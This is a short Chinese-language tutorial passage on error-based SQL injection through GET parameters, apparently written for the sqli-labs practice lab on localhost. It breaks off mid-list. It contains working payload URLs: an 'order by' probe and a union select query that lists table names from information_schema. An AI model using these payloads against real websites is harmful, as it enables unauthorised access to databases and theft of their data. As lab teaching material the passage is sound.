一、SQL注入

GET和POST请求

• GET提交，请求的数据会附在URL之后（就是把数据放置在HTTP协议头中），以?分割URL 和传输数据，多个参数用&连接

• POST提交：把提交的数据放置在是HTTP包的包体中。

  因此，GET提交的数据会在地址栏中显示出来，而POST提交，地址栏不会改变

二、 GET基于报错的SQL注入

通过url中修改对应的ID值,为正常数字、字符(单引号,双引号,括号)、反斜线来探测url中是 否存在注入点

2.1 get基于报错的SQL注入利用

1. order by判断字段数

   http://127.0.0.1/sqli/Less-1/?id=1’ order by 1 --+

2. 利用union select联合查询,获取表名

    http://127.0.0.1/sqli/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.`tables` where table_schema=database() --+
   

3. 利用union select联合查询,获取字段名